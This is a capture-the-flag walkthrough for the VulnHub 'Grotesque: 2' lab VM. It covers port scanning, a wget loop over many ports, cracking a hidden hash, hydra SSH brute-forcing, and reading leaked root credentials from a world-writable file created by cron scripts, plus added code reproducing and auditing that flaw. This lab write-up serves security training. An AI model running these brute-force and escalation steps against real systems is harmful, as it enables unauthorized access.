Target Description

Target URL: https://www.vulnhub.com/entry/grotesque-2,673/

Description

get flags

difficulty: medium

about vm: do not touch ram allocation. vm needs 4gb of ram. tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.

This works better with VirtualBox rather than VMware

1. Lab Setup

Attacker: Kali

IP address: 192.168.9.3

Target

IP address: 192.168.9.10

Note: the target and Kali only need to be on the same LAN (same subnet, i.e. both VMs use the same network mode).

The lab is set up as follows:

  1. Import the downloaded VM into VirtualBox and set its adapter to Host-Only mode.
  2. Set the bridged adapter in VMware to VirtualBox's Host-only adapter.

2. Walkthrough

2.1 Network scanning

2.1.1 Start the target and Kali, then scan for the host

Method 1: arp-scan -I eth0 -l (scan on the given interface)

arp-scan -I eth0 -l

Method 2: masscan <subnet to scan> -p <ports to scan>

masscan 192.168.184.0/24 -p 80,22

Method 3: netdiscover -i <interface> -r <subnet>

netdiscover -i eth0 -r 192.168.184.0/24

Method 4: left for readers to add

2.1.2 Find the target's open ports

Use nmap -A -sV -T4 -p- <target IP> to list the target's open ports.

That scan suits hosts with only a few open ports, since it returns detailed information about each service.

Run nmap -A -sV -T4 -p- -oN namp.txt 192.168.9.10 and let it work in the background.

Because this target has far too many open ports,

we first do a quick pass with nmap -sT 192.168.9.10.

⬢  Grotesque: 2  nmap -sT 192.168.9.10
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-02 17:50 CST
Nmap scan report for bogon (192.168.9.10)
Host is up (0.0013s latency).
Not shown: 921 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
32/tcp  open  unknown
33/tcp  open  dsp
37/tcp  open  time
42/tcp  open  nameserver
43/tcp  open  whois
49/tcp  open  tacacs
53/tcp  open  domain
70/tcp  open  gopher
79/tcp  open  finger
80/tcp  open  http
81/tcp  open  hosts2-ns
82/tcp  open  xfer
83/tcp  open  mit-ml-dev
84/tcp  open  ctf
85/tcp  open  mit-ml-dev
88/tcp  open  kerberos-sec
89/tcp  open  su-mit-tg
90/tcp  open  dnsix
99/tcp  open  metagram
100/tcp open  newacct
106/tcp open  pop3pw
109/tcp open  pop2
110/tcp open  pop3
111/tcp open  rpcbind
113/tcp open  ident
119/tcp open  nntp
125/tcp open  locus-map
135/tcp open  msrpc
139/tcp open  netbios-ssn
143/tcp open  imap
144/tcp open  news
146/tcp open  iso-tp0
161/tcp open  snmp
163/tcp open  cmip-man
179/tcp open  bgp
199/tcp open  smux
211/tcp open  914c-g
212/tcp open  anet
222/tcp open  rsh-spx
254/tcp open  unknown
255/tcp open  unknown
256/tcp open  fw1-secureremote
259/tcp open  esro-gen
264/tcp open  bgmp
280/tcp open  http-mgmt
301/tcp open  unknown
306/tcp open  unknown
311/tcp open  asip-webadmin
340/tcp open  unknown
366/tcp open  odmr
389/tcp open  ldap
406/tcp open  imsp
407/tcp open  timbuktu
416/tcp open  silverplatter
417/tcp open  onmux
425/tcp open  icad-el
427/tcp open  svrloc
443/tcp open  https
444/tcp open  snpp
445/tcp open  microsoft-ds
458/tcp open  appleqtc
464/tcp open  kpasswd5
465/tcp open  smtps
481/tcp open  dvs
497/tcp open  retrospect
500/tcp open  isakmp
512/tcp open  exec
513/tcp open  login
514/tcp open  shell
515/tcp open  printer
524/tcp open  ncp
541/tcp open  uucp-rlogin
543/tcp open  klogin
544/tcp open  kshell
545/tcp open  ekshell
548/tcp open  afp
554/tcp open  rtsp
555/tcp open  dsf
MAC Address: 08:00:27:E7:87:C3 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.49

Far too many ports are open, and each one is mapped to a service name.

After a while the full scan results came out:

# Nmap 7.92 scan initiated Mon May  2 17:45:06 2022 as: nmap -A -sV -T4 -p- -oN namp.txt 192.168.9.10
Nmap scan report for bogon (192.168.9.10)
Host is up (0.00062s latency).
Not shown: 65009 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
31/tcp  open  http    PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
32/tcp  open  http    PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
... (identical entries omitted) ...
80/tcp  open  http    PHP cli server 5.5 or later
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_auth-owners: ERROR: Script execution failed (use -d to debug)
81/tcp  open  http    PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
... (identical entries omitted) ...
555/tcp open  http    PHP cli server 5.5 or later
|_auth-owners: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:E7:87:C3 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms bogon (192.168.9.10)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May  2 17:56:12 2022 -- 1 IP address (1 host up) scanned in 665.77 seconds

Notice that nearly all of them are http.

2.2 Vulnerability enumeration

2.2.1 Port 80

With so many open ports, start with port 80 as usual: http://192.168.9.10/

Nothing in the page source either, so brute-force directories:

⬢  Grotesque: 2  gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.9.10 -x php,html,txt,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.10
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,zip,bak,php
[+] Timeout:                 10s
===============================================================
2022/05/02 17:54:55 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.9.10/74c31a13-d670-419d-ab99-a39422881851 => 200 (Length: 412). To continue please exclude the status code, the length or use the --wildcard switch
⬢  Grotesque: 2

Clearly the entry point is not here.

2.2.2 Analysing all the ports

From the nmap results, all the remaining ports are http.

Visiting a few at random, the pages are all identical.

I decided to download every page with wget to check whether the files actually differ:

for i in {23..600};do wget 192.168.9.10:$i -O index$i;done

Once the downloads finish, run ls -al | sort to sort the files.

All pages are 412 bytes except port 258, which is 762 bytes.
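The same comparison done by content checksum rather than by eyeballing file sizes, as an added example that is not part of the original write-up. The downloaded pages are stand-ins constructed in a scratch directory, and every file whose checksum differs from the majority is reported (it also catches a differing page that happens to have the same byte length).

```shell
#!/bin/sh
# Added example: group downloaded index files by content checksum and report
# the ones that differ from the majority (the outlier on this box was port 258).
# The files are constructed below; nothing is fetched from the network.

# Print the names of files in $1 whose checksum is not the most common one.
find_outliers() {
    dir=$1
    # cksum prints "crc size name"; the most frequent crc is the "normal" page.
    common=$(cd "$dir" && cksum * | awk '{print $1}' | sort | uniq -c | sort -rn | awk 'NR==1{print $2}')
    (cd "$dir" && cksum * | awk -v c="$common" '$1 != c {print $3}')
}

# Constructed stand-in for the wget loop: the same page on every port except
# one, which carries extra content.
demo_outliers() {
    d=$(mktemp -d)
    for i in $(seq 250 260); do
        printf '<html><body>nothing here</body></html>\n' > "$d/index$i"
    done
    printf '<html><body>users: atan raphael angel</body></html>\n' > "$d/index258"
    find_outliers "$d"
    rm -rf "$d"
}

demo_outliers   # prints "index258"
```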

2.2.3 Port 258

Visit http://192.168.9.10:258/

The page lists several SSH usernames:

atan, raphael, angel, distress, greed, lust

This almost certainly means SSH password brute-forcing, but where does the wordlist come from?

Then I noticed that the image on the second line can be opened.

Its colour is slightly off; zooming in reveals a hash string.

At that size it is very blurry.

Much clearer now: b6e705ea1249e2bb7b01d7dac91cd0b3

Crack it with CrackStation.

The password is solomon1.

Create the wordlist users.txt:

atan
raphael
angel
distress
greed
lust

Brute-force with hydra: hydra -L users.txt -p solomon1 ssh://192.168.9.10 -f

⬢  Grotesque: 2  hydra -L users.txt -p solomon1 ssh://192.168.9.10 -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-02 18:51:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.9.10:22/
[22][ssh] host: 192.168.9.10   login: angel   password: solomon1
[STATUS] attack finished for 192.168.9.10 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-05-02 18:51:25

Hydra found the credentials angel / solomon1.

Try logging in:

⬢  Grotesque: 2  ssh angel@192.168.9.10
The authenticity of host '192.168.9.10 (192.168.9.10)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.10' (ED25519) to the list of known hosts.
angel@192.168.9.10's password:
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
angel@grotesque:~$

2.3 Exploitation

2.4 Privilege escalation

2.4.1 Information gathering

Check what is in the current directory:

angel@grotesque:~$ ls -al
total 52
drwxr-xr-x 4 angel angel  4096 Mar 27  2021 .
drwxr-xr-x 3 root  root   4096 Mar 27  2021 ..
drwxr-xr-x 2 angel angel 36864 Mar 27  2021 quiet
drwx------ 2 angel angel  4096 Mar 27  2021 .ssh
-r-x------ 1 angel angel  1805 Jan  3  2021 user.txt
angel@grotesque:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
angel@grotesque:~$

Flag 1 obtained; there is also a new directory, quiet.

Check what is in the quiet directory.

No idea what that stuff is.

Upload pspy64 to look for scheduled tasks.

I used FileZilla here; wget or similar works just as well.

Make it executable, then run it:

chmod 777 pspy64
./pspy64

It shows the scripts write.sh and check.sh being run at fixed intervals.

Right now we have no permission to read them:

angel@grotesque:/tmp$ cat /root/check.sh
cat: /root/check.sh: Permission denied
angel@grotesque:/tmp$ cat /root/write.sh
cat: /root/write.sh: Permission denied
angel@grotesque:/tmp$

Earlier we found some odd files in /home/angel/quiet; are they written by these scripts?

Try deleting every file in that directory and see what happens.

After the two scripts run, files are created in quiet again, all identical.

Hmm... upload linpeas.sh as well and take a look.

It flags rootcreds.txt under / as a file modified in the last 5 minutes.

View its contents:

angel@grotesque:/tmp$ cd /
angel@grotesque:/$ ls
bin  boot  dev  etc  home  initrd.img  initrd.img.old  lib  lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  rootcreds.txt  run  sbin  srv  sys  tmp  usr  var  vmlinuz  vmlinuz.old
angel@grotesque:/$ cat root
root/          rootcreds.txt
angel@grotesque:/$ cat rootcreds.txt
root creds

root
sweetchild
root creds

root
sweetchild
angel@grotesque:/$

This must be the root password.

Try switching to root:

angel@grotesque:/$ su root
Password:
root@grotesque:/# cd /root
root@grotesque:~# ls
check.sh  logdel2  real  real.sh  root.txt  test  upit2.sh  upit.sh  write.sh
root@grotesque:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@grotesque:~#

Flag 2 obtained.

Looking back at check.sh and write.sh:

root@grotesque:~# cat check.sh
#!/bin/bash
cd /home/angel/quiet
if [[ $(ls) == "" ]]; then
echo "root creds" >> /rootcreds.txt
echo "" >> /rootcreds.txt
echo "root" >> /rootcreds.txt
echo "sweetchild" >> /rootcreds.txt
chmod 777 /rootcreds.txt
fi
root@grotesque:~# cat write.sh
#!/bin/bash
cd /home/angel/quiet
for i in {1..2323}; do echo "quiet" >> $i; done
root@grotesque:~#

When check.sh runs it executes ls in /home/angel/quiet; if the directory is empty it writes the root credentials to a file named rootcreds.txt in /, then gives that file read, write and execute permission for everyone.

write.sh creates the files 1 through 2323 and writes quiet into every one of them.
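The two cron scripts reproduced against a scratch directory, as an added example that is not code from the box: the leaky check.sh logic is kept as-is, a variant that creates the file with owner-only permissions is placed beside it, and the audit check a defender would run afterwards (list world-readable files a root job left behind) shows that only the original variant leaves the credentials exposed. Paths are temporary stand-ins for /home/angel/quiet and /rootcreds.txt.

```shell
#!/bin/sh
# Added example, not code from the box: reproduces check.sh and write.sh in a
# scratch directory and audits what each leaves world-readable.

# Stand-in for write.sh: refill the watched directory (a few files, not 2323).
fill_quiet() {                      # $1 = watched directory
    for i in $(seq 1 20); do echo "quiet" >> "$1/$i"; done
}

# Stand-in for check.sh, keeping its flaw: when the watched directory is
# empty, the credentials land in a file that is then made mode 777.
leaky_check() {                     # $1 = watched directory, $2 = creds file
    if [ -z "$(ls "$1")" ]; then
        { echo "root creds"; echo ""; echo "root"; echo "sweetchild"; } >> "$2"
        chmod 777 "$2"
    fi
}

# What a root cron job should do instead: log the event, never the secret,
# and create the file owner-only from the start instead of loosening it.
safe_check() {                      # $1 = watched directory, $2 = log file
    if [ -z "$(ls "$1")" ]; then
        (umask 077; echo "directory $1 was emptied at $(date)" >> "$2")
    fi
}

# Audit: regular files directly under $1 that any user on the host can read.
world_readable() {                  # $1 = directory
    find "$1" -maxdepth 1 -type f -perm -o=r
}

# Run both variants and report how many world-readable files each leaves.
demo() {
    work=$(mktemp -d)
    mkdir "$work/quiet"
    fill_quiet "$work/quiet"
    leaky_check "$work/quiet" "$work/rootcreds.txt"   # dir not empty: nothing written
    filled=$(world_readable "$work" | wc -l | tr -d ' ')
    rm -f "$work/quiet"/*
    leaky_check "$work/quiet" "$work/leaky.txt"       # dir empty: creds written, 777
    safe_check  "$work/quiet" "$work/safe.txt"        # dir empty: 0600 log entry
    emptied=$(world_readable "$work" | wc -l | tr -d ' ')
    rm -rf "$work"
    echo "$filled $emptied"
}

demo   # prints "0 1": only the leaky variant leaves a world-readable file
```

On the box itself the same audit is the one-liner linpeas effectively ran: find / -mmin -5 -type f -perm -o=r, which surfaces a freshly written, world-readable file under / regardless of its name.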

Summary

Another fairly interesting box.

  1. Information gathering
  2. Brute-forcing SSH with hydra
